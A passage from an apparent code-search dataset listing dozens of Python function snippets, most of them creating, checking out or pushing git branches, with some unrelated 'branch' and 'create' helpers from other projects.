create_branch_func(\n source_branch_name, get_branch_name(jira_url, jira_username, jira_api_key, issue_key, project_key)\n )\n ))", "def branch(self, name, ref=\"HEAD\"):\n self._git.create_head(name, ref)\n self.checkout(name)", "def create_topic_branch(self, topic_branch_name):\n print(\"Creating topic branch locally...\")\n self.git.checkout(self.base_branch)\n self.git.checkout('-b', topic_branch_name)\n print(\"Pushing topic branch to base branch's remote...\")\n self.git.push('-u', self.base_branch_remote(), topic_branch_name)", "def test_heads_create_new_branch_at_another_branch(repository: Repository) -> None:\n main = repository.head\n branch1 = repository.heads.create(\"branch1\")\n\n repository.checkout(branch1)\n repository.commit()\n\n repository.checkout(main)\n branch2 = repository.heads.create(\"branch2\", branch1.commit)\n\n assert branch1.commit == branch2.commit", "def create_branch(branch, orphaned=False, changeto=False, directory=None):\n current_branch = get_current_branch(directory)\n try:\n if orphaned:\n execute_command('git symbolic-ref HEAD refs/heads/' + branch,\n cwd=directory)\n execute_command('rm -f .git/index', cwd=directory)\n execute_command('git clean -fdx', cwd=directory)\n cmd = 'git commit --allow-empty -m \"Created orphaned branch '\\\n '{0}\"'.format(branch)\n execute_command(cmd, cwd=directory)\n if changeto:\n current_branch = None\n else:\n execute_command('git branch {0}'.format(branch), cwd=directory)\n if changeto:\n checkout(branch, directory=directory)\n current_branch = None\n finally:\n if current_branch is not None:\n checkout(current_branch, directory=directory)", "def branch(self, new_branch_id: str, empty: bool = False) -> None:\n self._check_connection()\n if empty:\n source = {}\n elif self._ref:\n source = {\n \"origin\": f\"{self._account}/{self._db}/{self._repo}/commit/{self._ref}\"\n }\n else:\n source = {\n \"origin\": f\"{self._account}/{self._db}/{self._repo}/branch/{self._branch}\"\n }\n\n self._dispatch(\"post\", self._branch_url(new_branch_id), source)", "def _make_release_branch(self):\n user = getpass.getuser()\n if not user == self._user:\n raise Error('the command should only be run as user %s' % self._user)\n branch = self._branch\n # get the latest master updates\n subprocess.check_call('git remote update', shell=True)\n subprocess.check_call('git checkout master', shell=True)\n # does a git pull and updates the submodules\n GitUtil.update_submodules()\n # get the latest commit before the release is cut\n self._latest_commit = GitUtil.get_latest_commit()\n print 'Making release branch %s' % branch\n # create the new release branch\n GitUtil.create_branch(branch)\n print TermColor.ColorStr('Created remote branch %s' % branch, 'GREEN')", "def create_branch(self, new_branch, delete_empty=False):\n logger.info(\"Preparing to create branch {} from {}\".format(new_branch, self.config.branch))\n try:\n # create new branch\n self.provider.create_branch(\n base_branch=self.config.branch,\n new_branch=new_branch,\n repo=self.user_repo\n )\n logger.info(\"Created branch {} from {}\".format(new_branch, self.config.branch))\n return True\n except BranchExistsError:\n logger.info(\"Branch {} exists.\".format(new_branch))\n # if the branch exists, is empty and delete_empty is set, delete it and call\n # this function again\n if delete_empty:\n if self.provider.is_empty_branch(self.user_repo, self.config.branch, new_branch,\n self.config.branch_prefix):\n self.provider.delete_branch(self.user_repo, new_branch,\n self.config.branch_prefix)\n logger.info(\"Branch {} was empty and has been deleted\".format(new_branch))\n return self.create_branch(new_branch, delete_empty=False)\n logger.info(\"Branch {} is not empty\".format(new_branch))\n return False", "def test_heads_create_new_branch_at_ancestor(repository: Repository) -> None:\n parent = repository.head.commit\n updatefile(repository.path / \"a\")\n branch = repository.heads.create(\"branch\", parent)\n assert parent == branch.commit", "def test_heads_create_existing_branch_force(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n branch = heads.create(\"branch\", head.commit)\n updatefile(repository.path / \"a\")\n heads.create(branch.name, head.commit, force=True)\n assert head.commit == branch.commit", "def test_heads_create_existing_branch(repository: Repository) -> None:\n heads = repository.heads\n branch = heads.create(\"branch\", repository.head.commit)\n with pytest.raises(pygit2.AlreadyExistsError):\n heads.create(branch.name, branch.commit)", "def branch(branch_name):\n env.branch = branch_name", "def branch(branch_name):\n env.branch = branch_name", "def checkout_new_branch(self, branchname, current_path):\n p = Popen(\n [\"git\", \"checkout\", \"-b\", branchname],\n stdout=PIPE,\n stderr=PIPE,\n cwd=os.path.join(self.root_dir, current_path),\n )\n my_output, my_error = p.communicate()\n if p.returncode == 0:\n return {\"code\": p.returncode, \"message\": my_output.decode(\"utf-8\")}\n else:\n return {\n \"code\": p.returncode,\n \"command\": \"git checkout \" + \"-b\" + branchname,\n \"message\": my_error.decode(\"utf-8\"),\n }", "def create_branch_with_patch(self,\n branch_name,\n message,\n patch,\n author,\n force_push=False):\n self.clean()\n\n try:\n # This won't be exercised in production because wpt-exporter\n # always runs on a clean machine. But it's useful when running\n # locally since branches stick around.\n _log.info('Deleting old branch %s', branch_name)\n self.run(['git', 'branch', '-D', branch_name])\n except ScriptError:\n # This might mean the branch wasn't found. Ignore this error.\n pass\n\n _log.info('Creating local branch %s', branch_name)\n self.run(['git', 'checkout', '-b', branch_name])\n\n # Remove Chromium WPT directory prefix.\n patch = patch.replace(RELATIVE_WPT_TESTS, '')\n\n _log.info('Author: %s', author)\n if '<' in author:\n author_str = author\n else:\n author_str = '%s <%s>' % (author, author)\n\n # TODO(jeffcarp): Use git am -p<n> where n is len(RELATIVE_WPT_TESTS.split(/'))\n # or something not off-by-one.\n self.run(['git', 'apply', '-'], input=patch)\n self.run(['git', 'add', '.'])\n self.run(['git', 'commit', '--author', author_str, '-am', message])\n\n # Force push is necessary when updating a PR with a new patch\n # from Gerrit.\n if force_push:\n self.run(['git', 'push', '-f', 'origin', branch_name])\n else:\n self.run(['git', 'push', 'origin', branch_name])", "def test_branch_can_be_copied():\n\n setup_org()\n setup_repo()\n\n responses.add(responses.GET, \"https://api.github.com/repos/my-org/my-repo/branches/master\",\n body=my_repo_branch,\n content_type='text/json',\n status=200)\n\n responses.add(responses.POST, \"https://api.github.com/repos/my-org/my-repo/git/refs\",\n body=my_new_ref,\n content_type='text/json',\n status=201)\n\n responses.add(responses.GET, \"https://api.github.com/repos/my-org/my-repo/branches/main\",\n body=my_repo_branch,\n content_type='text/json',\n status=200)\n\n token = '__dummy__'\n org = \"my-org\"\n client = GithubRestClient(token)\n new_branch_name = \"main\"\n\n repo = get_repository(client, org, \"my-repo\")\n new_branch = copy_branch(repo, repo.default_branch, new_branch_name)\n assert None is not new_branch", "def post_comment_branch(user, branch_id, comment):\r\n\tfrom browse.models import BranchComment\r\n\tfrom accounts.models import RestaurantBranch\r\n\tbranch = RestaurantBranch.objects.get(id=branch_id)\r\n\tpost, _ = BranchComment.objects.get_or_create(branch=branch, user=user)\r\n\tpost.comment = comment\r\n\tpost.save()", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def __gitStashBranch(self):\n pfile = self.project.getProjectFile()\n lastModified = QFileInfo(pfile).lastModified().toString()\n shouldReopen = (\n self.vcs.gitStashBranch(self.project.getProjectPath()) or\n QFileInfo(pfile).lastModified().toString() != lastModified\n )\n if shouldReopen:\n res = E5MessageBox.yesNo(\n self.parent(),\n self.tr(\"Create Branch\"),\n self.tr(\"\"\"The project should be reread. Do this now?\"\"\"),\n yesDefault=True)\n if res:\n self.project.reopenProject()", "def create(\n self,\n kind,\n branch_match_kind=\"glob\",\n branch_pattern=\"*\",\n branch_type=None,\n users=None,\n groups=None,\n value=None,\n ):\n if branch_match_kind == \"branching_model\":\n branch_pattern = \"\"\n\n data = {\n \"kind\": kind,\n \"branch_match_kind\": branch_match_kind,\n \"pattern\": branch_pattern,\n }\n\n if branch_match_kind == \"branching_model\":\n data[\"branch_type\"] = branch_type\n\n if users is not None:\n data[\"users\"] = users\n\n if groups is not None:\n data[\"groups\"] = groups\n\n if value is not None:\n data[\"value\"] = value\n\n return self.__get_object(self.post(None, data=data))", "def test_instantiate_branch_node(self):\n try:\n BranchNode('my_name')\n except Exception:\n message = \"BranchNode instantiation failed\"\n self.fail(message)", "def branch(self, *arguments, **kwargs):\n return self.get_output('branch', *arguments, **kwargs)", "def add_branch(self, info):\n if not isinstance(info, list):\n raise TypeError(\"Argument enclosing new AC line(s) must be a list\")\n self._add_line(\"new_branch\", info)", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)", "def add_branch(self, branch):\n self.branch.append(branch)", "def _assign_branches(ctx, prl):\n heads = prl.set_heads\n if not heads:\n return None\n branch_dict = ctx.branch_dict()\n LOG.debug2('allowing branch creation: %s', ctx.branch_creation)\n # Assign branches to each of the received commits for pushed branches\n assigner = Assigner(branch_dict, heads, ctx)\n assigner.assign()\n return assigner", "def do_bay_create(cs, args):\n baymodel = cs.baymodels.get(args.baymodel)\n\n opts = {}\n opts['name'] = args.name\n opts['baymodel_id'] = baymodel.uuid\n opts['node_count'] = args.node_count\n opts['master_count'] = args.master_count\n opts['discovery_url'] = args.discovery_url\n opts['bay_create_timeout'] = args.timeout\n try:\n bay = cs.bays.create(**opts)\n # support for non-async in 1.1\n if args.magnum_api_version and args.magnum_api_version == '1.1':\n _show_bay(bay)\n else:\n uuid = str(bay._info['uuid'])\n print(\"Request to create bay %s has been accepted.\" % uuid)\n except Exception as e:\n print(\"Create for bay %s failed: %s\" %\n (opts['name'], e))", "def create(\n self,\n title,\n source_branch,\n destination_branch=None,\n description=None,\n close_source_branch=None,\n reviewers=None,\n ):\n\n rv = [{\"uuid\": x} for x in reviewers] if reviewers else []\n data = {\n \"title\": title,\n \"source\": {\"branch\": {\"name\": source_branch}},\n \"description\": description,\n \"close_source_branch\": close_source_branch,\n \"reviewers\": rv,\n }\n if destination_branch:\n data[\"destination\"] = {\"branch\": {\"name\": destination_branch}}\n\n return self.__get_object(self.post(None, data))", "def create_clowder_repo(self, url, branch, depth=0):\n\n if self.existing_git_repository(self.repo_path):\n return\n self._init_repo()\n self._create_remote(self.remote, url, remove_dir=True)\n self._checkout_new_repo_branch(branch, depth)", "def test_worktree_creates_worktree(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\")\n\n with repository.worktree(branch) as worktree:\n assert (worktree.path / \".git\").is_file()", "def __branch_factory(self, action, task_activities):\n branches = action.findall(\"./branches_Branch\")\n for branch in branches:\n branch_type = get_branch_type(branch=branch)\n if \"probabilistic\" == branch_type:\n return self.__add_probabilistic_branch(action=action, task_activities=self.task_activities)\n elif \"type\" == branch_type:\n return self.__add_type_branch(action=action, task_activities=task_activities)\n elif \"detailed\" == branch_type:\n return self.__add_detailed_branch(action=action, task_activities=task_activities)\n elif \"simple\" == branch_type:\n return self.__add_simple_branch(action=self.action, task_activities=self.task_activities)\n else:\n raise ValueError(\"Unknown branch_type. Abort Mission.\")", "def test_heads_create_default_commit(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\")\n assert branch.commit == repository.head.commit", "def test_branching(self):\r\n repo_dir = self.GIT_REPO_DIR\r\n # Test successful import from command\r\n if not os.path.isdir(repo_dir):\r\n os.mkdir(repo_dir)\r\n self.addCleanup(shutil.rmtree, repo_dir)\r\n\r\n # Checkout non existent branch\r\n with self.assertRaisesRegexp(GitImportError, GitImportError.REMOTE_BRANCH_MISSING):\r\n git_import.add_repo(self.TEST_REPO, repo_dir / 'edx4edx_lite', 'asdfasdfasdf')\r\n\r\n # Checkout new branch\r\n git_import.add_repo(self.TEST_REPO,\r\n repo_dir / 'edx4edx_lite',\r\n self.TEST_BRANCH)\r\n def_ms = modulestore()\r\n # Validate that it is different than master\r\n self.assertIsNotNone(def_ms.get_course(self.TEST_BRANCH_COURSE))\r\n\r\n # Attempt to check out the same branch again to validate branch choosing\r\n # works\r\n git_import.add_repo(self.TEST_REPO,\r\n repo_dir / 'edx4edx_lite',\r\n self.TEST_BRANCH)\r\n\r\n # Delete to test branching back to master\r\n delete_course(def_ms, contentstore(),\r\n self.TEST_BRANCH_COURSE,\r\n True)\r\n self.assertIsNone(def_ms.get_course(self.TEST_BRANCH_COURSE))\r\n git_import.add_repo(self.TEST_REPO,\r\n repo_dir / 'edx4edx_lite',\r\n 'master')\r\n self.assertIsNone(def_ms.get_course(self.TEST_BRANCH_COURSE))\r\n self.assertIsNotNone(def_ms.get_course(SlashSeparatedCourseKey.from_deprecated_string(self.TEST_COURSE)))", "def free_branch(allow_create=False, str_if_none=False):\n repo = git.repo()\n current_branch = repo.current_branch()\n result = None\n if current_branch:\n if not is_nice_branch(current_branch):\n result = current_branch\n else:\n proposed_branch = re.sub( nice_branch_regex, \"\", current_branch)\n if not repo.has_branch(proposed_branch):\n if allow_create:\n result = proposed_branch\n repo.create_branch(proposed_branch,startpoint=remote_branch())\n else:\n result = proposed_branch\n if not result and str_if_none:\n result = no_branch\n return result", "def cmd_change_branch(branch, new=False):\n cmd = ['git', 'checkout']\n\n if new:\n cmd.append('-b')\n\n cmd.append(branch)\n\n return cmd", "def start(self, remote, branch, depth, tracking):\n\n if branch not in self.repo.heads:\n if not is_offline():\n return_code = self.fetch(remote, ref=branch, depth=depth)\n if return_code != 0:\n sys.exit(1)\n return_code = self._create_branch_local(branch)\n if return_code != 0:\n self._exit('', return_code=return_code)\n return_code = self._checkout_branch_local(branch)\n if return_code != 0:\n self._exit('', return_code=return_code)\n else:\n branch_output = fmt.ref_string(branch)\n print(' - ' + branch_output + ' already exists')\n correct_branch = self._is_branch_checked_out(branch)\n if correct_branch:\n print(' - On correct branch')\n else:\n return_code = self._checkout_branch_local(branch)\n if return_code != 0:\n self._exit('', return_code=return_code)\n if tracking and not is_offline():\n self._create_branch_remote_tracking(branch, remote, depth)", "def add_branch(self, branch, pidx=None, random_color=True):\n if random_color:\n rand_node_type = randrange(6, 257)\n\n new_branch = np.zeros((len(branch.pts), 8))\n id_start = 1 if self._data.shape[0] == 1 else self._data[:, 0].max() + 1\n\n for i in range(len(branch.pts)):\n p, r, c = branch.pts[i], branch.radius[i], branch.conf[i]\n id = id_start + i\n # 3 for basal dendrite; 4 for apical dendrite;\n # However now we cannot differentiate them automatically\n nodetype = 3\n\n if i == len(branch.pts) - 1: # The end of this branch\n pid = self._data[pidx, 0] if pidx is not None else -2\n if pid != -2 and pid != 0 and self._data.shape[0] != 1:\n # Its connected node is fork point\n self._data[self._data[:, 0] == pid, 1] = 5\n else:\n pid = id_start + i + 1\n if i == 0:\n nodetype = 6 # Endpoint\n\n assert pid != id\n new_branch[i] = np.asarray(\n [\n id,\n rand_node_type if random_color else nodetype,\n p[0],\n p[1],\n p[2],\n r,\n pid,\n c,\n ]\n )\n\n # Check if any tail should be connected to its tail\n tail = new_branch[0]\n matched, minidx = self.match(tail[2:5], tail[5])\n if matched and self._data[minidx, 6] == -2:\n self._data[minidx, 6] = tail[0]\n\n self._data = np.vstack((self._data, new_branch))", "def repo_new(request):\n if request.method != 'POST':\n form = RepoForm()\n return respond(request, 'repo_new.html', {'form': form})\n form = RepoForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n repo = models.Repository(\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n guid=form.cleaned_data.get('guid'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'repo_new.html', {'form': form})\n repo.put()\n branch_url = repo.url\n if not branch_url.endswith('/'):\n branch_url += '/'\n branch_url += 'trunk/'\n branch = models.Branch(repo_key=repo.key, repo_name=repo.name,\n category='*trunk*', name='Trunk',\n url=branch_url)\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def branch(self, name: str) -> GitRef:\n _args = [\n Arg(\"name\", name),\n ]\n _ctx = self._select(\"branch\", _args)\n return GitRef(_ctx)", "def _create_checkout(self):\n parent_git_dir = os.path.join(self._parent_repo, self._run_git_command(\n ['rev-parse', '--git-dir']).strip())\n self._workdir = tempfile.mkdtemp(prefix='drover_%s_' % self._branch)\n logging.debug('Creating checkout in %s', self._workdir)\n git_dir = os.path.join(self._workdir, '.git')\n git_common.make_workdir_common(parent_git_dir, git_dir, self.FILES_TO_LINK,\n self.FILES_TO_COPY, mk_symlink)\n self._run_git_command(['config', 'core.sparsecheckout', 'true'])\n with open(os.path.join(git_dir, 'info', 'sparse-checkout'), 'w') as f:\n f.write('/codereview.settings')\n\n branch_name = os.path.split(self._workdir)[-1]\n self._run_git_command(['checkout', '-b', branch_name, self._branch_ref])\n self._branch_name = branch_name", "def create_release(ctx):\n # Get the head of master\n r = _get_repo()\n b = r.get_branch(branch=\"master\")\n head = b.commit\n\n faasm_ver = get_faasm_version()\n\n # Create a tag from the head\n tag_name = _tag_name(faasm_ver)\n r.create_git_tag(\n tag_name,\n \"Release {}\\n\".format(faasm_ver),\n head.sha,\n \"commit\",\n )\n\n r.create_git_release(\n tag_name,\n \"Faasm {}\".format(faasm_ver),\n \"Release {}\\n\".format(faasm_ver),\n draft=True\n )", "def add_branch(self, branch: SourceBranch) -> None:\n branch_id = branch.id_\n if branch_id in self.branches:\n self.branches[branch_id].combine(branch)\n else:\n self.branches[branch_id] = branch", "def add_branch_to_TTree(tree, br):\n ptr = array('f', [0.])\n tree.Branch(br, ptr, \"%s/F\" % br)\n return ptr", "def push_latest_branch (product, which, main_branch):\n\n name = \"Latest_ACE7TAO3_\" + which\n\n if opts.push:\n vprint (\"Pushing branch\", name)\n ex (\"cd $DOC_ROOT/\" + product + \" && git push origin refs/heads/\" + name,\n allow_fail=True)", "def new_branch_tree(tree, ids):\n branch_tree = {}\n branch_tree[\"selftext\"] = tree[\"selftext\"]\n branch_tree[\"title\"] = tree[\"title\"]\n branch_tree[\"id\"] = tree[\"id\"]\n branch_tree[\"comments\"] = {}\n for id in ids[1:]:\n branch_tree[\"comments\"][id] = tree[\"comments\"][id]\n return branch_tree", "def create():", "def create():", "def push(self, remote, branch, *args):\n return self.cmd('push', remote, branch, *args)", "def install_branch(branch):\n\n # if it's already in the virtualenv, remove it\n ver = '.'.join(map(str,(sys.version_info.major,sys.version_info.minor)))\n sitepack = os.path.join(virtual_dir, 'lib','python'+ver, 'site-packages')\n if os.path.exists(sitepack):\n dir_list = os.listdir(sitepack)\n else:\n dir_list = []\n for f in dir_list:\n if 'statsmodels' in f:\n shutil.rmtree(os.path.join(sitepack, f))\n\n # checkout the branch\n os.chdir(gitdname)\n retcode = subprocess.call('git checkout ' + branch, shell=True)\n if retcode != 0:\n msg = \"\"\"Could not checkout out branch %s\"\"\" % branch\n raise Exception(msg)\n\n # build and install\n retcode = subprocess.call(\" \".join([virtual_python, 'setup.py', 'build']),\n shell=True)\n if retcode != 0:\n msg = \"\"\" Could not build branch %s\"\"\" % branch\n raise Exception(msg)\n retcode = subprocess.call(\" \".join([virtual_python, os.path.join(gitdname,\n 'setup.py'), 'install']), shell=True)\n if retcode != 0:\n os.chdir(dname)\n msg = \"\"\"Could not install branch %s\"\"\" % branch\n raise Exception(msg)\n os.chdir(dname)", "def create():\n pass", "def addBranch(self, value, node):\n self.branches[value] = node", "def create_new_banks():\n\n\tcity = request.form.get('bankCity', '')\n\tname = request.form.get('bankName', '')\n\taddress = request.form.get('bankAddress', '')\n\tinfo = dict(city=city, name=name, address=address)\n\t# print(info)\n\tbank = Bank(city, name, address)\n\tres = bank.save()\n\t# print('res=%d' % res)\n\treturn send_result(info, res, status=\"True\")", "def add_branch(mb, k, l):\n return _RNAstructure_wrap.add_branch(mb, k, l)", "def create_label(self, repository, name, color, **kwargs):\n data = {'name': name, 'color': color}\n response = self.session.post(\n '{}/repos/{}/labels'.format(self.GH_API_ENDPOINT, repository),\n json=data\n )\n if response.status_code != 201:\n raise GitHubError(response)", "def switchToBranch(self):\n branches = self._listBranches()\n if not branches:\n raise error.ExpectationFailed(\n 'No branches available. Please import one.')\n\n choice = io.getChoice('Available release branches:',\n 'Your choice?',\n branches,\n suggest=len(branches)-1)\n self._switchBranch(branches[choice])", "def branch(self, node, formula = None):\n print(f\"Branching on node {node.node_id}\")\n child_node_id1 = len(self.nodes)\n child_node_id2 = len(self.nodes)+1\n child_node1 = node.add_child(child_node_id1, len(self.node_memory))\n child_node2 = node.add_child(child_node_id2, len(self.node_memory)+1)\n print(f\"Adding nodes {child_node_id1} and {child_node_id2}\")\n self.nodes.append(child_node1)\n self.nodes.append(child_node2)\n self.node_memory.append(child_node1)\n self.node_memory.append(child_node2)\n child_node1.parent_formula = formula\n child_node2.parent_formula = formula\n formula.node_children.append(child_node1)\n formula.node_children.append(child_node2)", "def branch(self, name=None, clean=None, force=None):\n\n if name and clean:\n raise ValueError('Cannot use both name and clean')\n\n self._client.execute('branch', name, f=force, C=clean)\n\n if name:\n return name\n elif not clean:\n return out.strip()\n else:\n return out[len('reset working directory to branch '):]", "def git_branch(self, app, branch):\n if app == self.PROJECT_NAME:\n app_path = self.PROJECT_DIR\n else:\n raise ValueError('Unknown app')\n\n with lcd(app_path):\n self.local('git pull && git checkout %s' % branch)\n\n self.display('%s has been successfully switched to tag/branch %s.' % (app, branch), color='green')", "def create(ctx):\n pass", "def create(title, head, base='master', message=''):\n review_info = {\n 'title': title,\n 'body': message,\n 'head': head,\n 'base': base,\n }\n\n data = json_encode(review_info)\n review = parse(gh_request('POST', '/repos/:user/:repo/pulls', body=data))\n printers.print_review_created(review)", "def create_branch(self, gui_id):\n if gui_id not in self.SMGData.keys():\n self.SMGData[gui_id] = dict()\n self.SMGData[gui_id]['Mask'] = None\n self.SMGData[gui_id]['gMuns'] = None\n self.SMGData[gui_id]['phaseraw'] = None\n self.SMGData[gui_id]['deltagM'] = None\n self.SMGData[gui_id]['phasegM'] = None\n self.SMGData[gui_id]['shiftg'] = None\n self.SMGData[gui_id]['gCuns'] = None\n else:\n raise Exception('Key gui_id already exists, branch creation aborted')", "def create_builds(self):\n branches = self.search([('use_in_ci', '=', True)])\n branches.create_build()\n return True", "def create(self, *args, **kwargs):\n pass", "def _add_branch(wit_path, name, head):\n\n with open(os.path.join(wit_path, '.wit', 'references.txt'), 'a') as data:\n data.write(''.join(f'\\n{name}={head}'))", "def test_create_experiment_hit_branch(self):\n with OrionState(experiments=[config]) as cfg:\n experiment = create_experiment(\n config[\"name\"],\n space={\"y\": \"uniform(0, 10)\"},\n branching={\"enable\": True},\n storage=cfg.storage_config,\n )\n\n assert experiment.name == config[\"name\"]\n assert experiment.version == 2\n assert experiment.algorithm\n assert experiment.algorithm.configuration == config[\"algorithm\"]\n assert experiment.max_trials == config[\"max_trials\"]\n assert experiment.max_broken == config[\"max_broken\"]\n assert experiment.working_dir == config[\"working_dir\"]", "def create_branches(branches, pcoll, provider_options):\n\n logger.info('Branch count: %i' % len(branches))\n pcoll_tuple = ()\n\n for branch in branches:\n logger.info('Adding branch')\n output = create_graph(branch, pcoll, provider_options)\n pcoll_tuple = pcoll_tuple + (output,)\n\n logger.info('Transform: MergeBranches')\n output = pcoll_tuple | 'MergeBranches' >> MergeBranches()\n return output", "def branch(self, current_path):\n p = subprocess.Popen(\n [\"git\", \"show-ref\"],\n stdout=PIPE,\n stderr=PIPE,\n cwd=os.path.join(self.root_dir, current_path),\n )\n output, error = p.communicate()\n if p.returncode == 0:\n results = []\n try:\n current_branch = self.get_current_branch(current_path)\n for line in output.decode(\"utf-8\").splitlines():\n # The format for git show-ref is '<SHA-1 ID> <space> <reference name>'\n # For this method we are only interested in reference name.\n # Reference : https://git-scm.com/docs/git-show-ref#_output\n commit_sha = line.strip().split()[0].strip()\n reference_name = line.strip().split()[1].strip()\n if self._is_branch(reference_name):\n branch_name = self._get_branch_name(reference_name)\n is_current_branch = self._is_current_branch(\n branch_name, current_branch\n )\n is_remote_branch = self._is_remote_branch(reference_name)\n upstream_branch_name = None\n if not is_remote_branch:\n upstream_branch_name = self.get_upstream_branch(\n current_path, branch_name\n )\n tag = self._get_tag(current_path, commit_sha)\n results.append(\n {\n \"is_current_branch\": is_current_branch,\n \"is_remote_branch\": is_remote_branch,\n \"name\": branch_name,\n \"upstream\": upstream_branch_name,\n \"top_commit\": commit_sha,\n \"tag\": tag,\n }\n )\n\n # Remote branch is seleted use 'git branch -a' as fallback machanism\n # to get add detached head on remote branch to preserve older functionality\n # TODO : Revisit this to checkout new local branch with same name as remote\n # when the remote branch is seleted, VS Code git does the same thing.\n if current_branch == \"HEAD\":\n results.append(\n {\n \"is_current_branch\": True,\n \"is_remote_branch\": False,\n \"name\": self._get_detached_head_name(current_path),\n \"upstream\": None,\n \"top_commit\": None,\n \"tag\": None,\n }\n )\n return {\"code\": p.returncode, \"branches\": results}\n except Exception as downstream_error:\n return {\n \"code\": p.returncode,\n \"command\": \"git show-ref\",\n \"message\": str(downstream_error),\n }\n else:\n return {\n \"code\": p.returncode,\n \"command\": \"git show-ref\",\n \"message\": error.decode(\"utf-8\"),\n }", "def gh_pages_branch(repo):\n repo.git.branch('gh-pages')\n repo.git.checkout('gh-pages')", "def __init__(self, git_repo_path: Path, git_repo_branch: str) -> None:\n self._repo: git.Repo = git.Repo(git_repo_path)\n self._branch: str = git_repo_branch\n if self._repo.head.ref.name != self._branch:\n for branch in self._repo.branches:\n if branch.name == self._branch:\n branch.checkout()\n break\n else:\n raise ValueError(\n f\"Branch {self._branch} doesn't exist in {self._repo.working_dir} repo\"\n )", "def __init__(self: \"DeleteBranchOperator\", conn_id: str = \"nessie_default\", branch: str = None, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n self.conn_id = conn_id\n if branch is None:\n raise Exception(\"Cannot have a null branch for commit operations\")\n self.branch = branch", "def create_board(self, board_id, comp):\n new_board = self.create_board_from_template(board_id)\n comp.answer(new_board.id)", "def add_new_branch(self, if_node):\n old_block = self.curr_block\n # First we create an explicit branch node\n self.curr_block = Branch(if_node)\n self.blocks.append(self.curr_block)\n add_edge(old_block, self.curr_block)\n branch = self.curr_block\n # Then we add a basic block for the true edge\n self.curr_block = self.gen_new_block()\n add_true_edge(branch, self.curr_block)\n # Note we add the block for the false edge later\n # TODO: This is confusing, can we make it simpler?\n return branch", "def create(self, comment):\r\n url = self.get_url()\r\n\r\n # when creating commits they don't get wrapped in {\"body\": <comment>}\r\n return http.Request('POST', url, params=comment), parsers.parse_json", "async def create_channel(self):\n self._logger.info(\"Deploying chaincode...\")\n network_file_path = os.path.join(os.getcwd(), \"network.json\")\n channel_config_path = os.path.join(self.config_path, \"channel-artifacts\", \"channel.tx\")\n\n self.fabric_client = Client(net_profile=network_file_path)\n\n org1_admin = self.fabric_client.get_user(org_name='org1.example.com', name='Admin')\n\n # Create a New Channel, the response should be true if succeed\n response = await self.fabric_client.channel_create(\n orderer='orderer1.example.com',\n channel_name='mychannel',\n requestor=org1_admin,\n config_tx=channel_config_path\n )\n self._logger.info(\"Result of channel creation: %s\", response)", "def make_commit(self, commit_message, branch_name) -> Commit:\n self.load_config()\n commit = Commit(commit_message)\n commit.branch_name = branch_name\n commit.init_config()\n branch = Branch.make_branch_from_config(branch_name)\n prev_commit = branch.get_current_commit()\n if prev_commit is not None:\n commit_number = prev_commit.commit_number\n commit.set_previous_commit_number(commit_number)\n commit.freeze_files(self.__indexed_files, self.__directory)\n self.__last_commit = commit\n self.config['info']['files'] = ''\n self.config['info']['last_commit'] = commit.commit_number\n self.config['info']['last_commit_branch'] = commit.branch_name\n self.save_config()\n return commit", "def post(self):\n try:\n request = self._create_borrow_node()\n #TODO Stop being lazy and return whole node\n br_id, user_id = self.borrow_repo.insert_one(request)\n self._send_notification(user_id)\n self.write({'id': br_id})\n except BumerangError as e:\n self.set_status(500)\n self.finish({'error': str(e)})", "def switch_branch(branch, rdir):\r\n # Get the latest remote\r\n try:\r\n cmd_log(['git', 'fetch', ], rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Unable to fetch remote: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n\r\n # Check if the branch is available from the remote.\r\n cmd = ['git', 'ls-remote', 'origin', '-h', 'refs/heads/{0}'.format(branch), ]\r\n try:\r\n output = cmd_log(cmd, rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Getting a list of remote branches failed: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n if not branch in output:\r\n raise GitImportError(GitImportError.REMOTE_BRANCH_MISSING)\r\n # Check it the remote branch has already been made locally\r\n cmd = ['git', 'branch', '-a', ]\r\n try:\r\n output = cmd_log(cmd, rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Getting a list of local branches failed: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n branches = []\r\n for line in output.split('\\n'):\r\n branches.append(line.replace('*', '').strip())\r\n\r\n if branch not in branches:\r\n # Checkout with -b since it is remote only\r\n cmd = ['git', 'checkout', '--force', '--track',\r\n '-b', branch, 'origin/{0}'.format(branch), ]\r\n try:\r\n cmd_log(cmd, rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Unable to checkout remote branch: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)\r\n # Go ahead and reset hard to the newest version of the branch now that we know\r\n # it is local.\r\n try:\r\n cmd_log(['git', 'reset', '--hard', 'origin/{0}'.format(branch), ], rdir)\r\n except subprocess.CalledProcessError as ex:\r\n log.exception('Unable to reset to branch: %r', ex.output)\r\n raise GitImportError(GitImportError.CANNOT_BRANCH)", "def Create(ctx,\n name,\n attributes = None):\n if ctx.element is None:\n ctx.logger.error(\"You must establish at least one connection and specify which you intend to use.\")\n exit()\n\n\n if(attributes is not None):\n kwargsDict = simplejson.loads(attributes)\n attributes = dict(**kwargsDict)\n\n ctx.logger.info(\"\"\"name = 